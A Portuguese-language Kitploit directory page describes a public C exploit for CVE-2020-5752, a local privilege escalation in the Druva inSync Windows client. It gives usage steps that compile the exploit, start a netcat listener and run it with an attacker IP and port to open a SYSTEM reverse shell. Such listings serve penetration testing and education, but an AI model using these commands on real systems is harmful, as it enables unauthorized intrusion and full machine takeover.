Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-5752 — Escalação Local de Privilégios para Druva | Kitploit
Ferramentas/GitHubGitHub/x0rbeexd/cve-2020-5752
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoExploração de Binários
GitHubx0rbeexd/cve-2020-5752

CVE-2020-5752

Escalação Local de Privilégios para Druva

Ver Repositório
1há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-5752: Druva inSync Escalação de Privilégio Local

Um exploit baseado em C para o Cliente Windows do Druva inSync (v6.6.3 e anteriores). O aplicativo expõe um serviço RPC na porta 6064 vulnerável a injeção de comandos via traversal de caminho. Isso permite que um usuário local execute comandos arbitrários como NT AUTHORITY\SYSTEM.

Detalhes da Vulnerabilidade

  • CVE: 2020-5752
  • Testado em: Windows 10 (x64)
  • Nível de Privilégio: Escalação de Privilégio Local (LPE)

Uso

1. Compilação

Use gcc (MinGW) para compilar o código-fonte:

root@kitploit:~
gcc exploit.c -o exploit.exe -lws2_32

2. Preparação

Coloque uma cópia do nc.exe em um diretório acessível pela conta SYSTEM (por exemplo, C:\Windows\Tasks).

3. Execução

Inicie um listener na sua máquina atacante:

root@kitploit:~

nc -lvnp 4444
Run the exploit on the target Windows machine:
root@kitploit:~
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe

Aviso Legal

Esta ferramenta é apenas para fins educacionais. O uso não autorizado em sistemas que você não tem permissão para testar é ilegal.

Baixar ferramenta